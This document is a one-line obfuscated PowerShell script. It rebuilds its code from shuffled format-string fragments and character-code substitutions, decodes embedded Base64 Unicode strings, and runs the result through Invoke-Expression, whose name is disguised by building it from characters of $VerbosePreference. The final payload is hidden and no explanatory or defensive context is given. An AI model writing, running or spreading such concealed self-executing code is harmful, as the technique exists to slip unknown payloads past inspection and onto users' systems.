 ((("{146}{30}{139}{108}{66}{76}{144}{61}{50}{142}{129}{133}{69}{132}{32}{147}{21}{58}{13}{59}{136}{23}{98}{45}{15}{54}{81}{24}{77}{83}{52}{85}{8}{17}{29}{2}{12}{94}{92}{137}{112}{33}{86}{75}{39}{89}{119}{22}{78}{110}{43}{135}{73}{103}{104}{84}{16}{80}{128}{82}{72}{123}{99}{46}{71}{19}{38}{44}{31}{127}{74}{87}{97}{35}{0}{18}{42}{34}{65}{20}{79}{14}{62}{49}{120}{114}{4}{27}{100}{111}{68}{140}{102}{96}{121}{55}{105}{47}{90}{25}{126}{109}{116}{95}{57}{7}{40}{28}{70}{3}{124}{113}{37}{1}{131}{11}{53}{6}{41}{130}{91}{101}{88}{26}{67}{107}{56}{93}{141}{106}{63}{138}{10}{134}{118}{115}{51}{122}{145}{143}{125}{60}{5}{48}{117}{64}{36}{9}"-f'    ','l','etStri','tring(','r','A','u','r','Enco','
','E','MyE','ng([','   ',' 
    wq','
  ','Cm','ding]::Unicode.','   ',' ','am1
  ',' [S','
}','qkpar','= ','ng]::','__9','am1 wqkpa','omBa','G','n','0',' 0)]
     ','4String(wqk','kpa',']
','iO0)','
    wqkresu','=',' r','t]::Fr','t-',' wq','Function _/',' ','  )
','        [P','.En','Q','/ ','a','TQBRAE','x',' o','  wqk','x','BR','[Conve','tring]
','     ','AZwBBADI','ding()] p','kparam1 = _//=/','AQQBMA','QA=','r','=//{
    [Cmdle','nF(i','kr','  [Parameter(Posit','se64S','arameter(Position','nding(','9n','[','ram1))
   ','tB','[T','
','  )
   ','d','result  ','Bi','e','    [','t.','pa','Stri','

_/=/9nF','e','codi','ll','rt]','AEIAdwB','Conve','String(',' [T','ng','am1
  ','
','ram1 
 ','
}',' =','F__','9nF{
','t','QBBAHcAQQBEAFU','O0YQ','ion _//','code.','
','   wq',':FromBase6',')','a','0AEEA','Get','QBEAFUAQ','A','turn wqkresult','-p','e','EAdw',')] param(','wqkparam1)','Ew','Uni',')]
        ','let','m(
 ','nu','t ','ion =','     ','EAQw','=/','w',':','GcAQQB5A','ct','esult','BAEQAbwBBAE0AU','ra','BA','in','BB
AEQARQB','Fu','  ')) -REpLACe([cHAR]57+[cHAR]110+[cHAR]70),[cHAR]92 -cRepLACE([cHAR]105+[cHAR]79+[cHAR]48),[cHAR]39 -cRepLACE([cHAR]77+[cHAR]121+[cHAR]69),[cHAR]124 -REpLACe([cHAR]119+[cHAR]113+[cHAR]107),[cHAR]36)| .( $VeRboseprEferenCe.tOstring()[1,3]+'X'-joIN'')
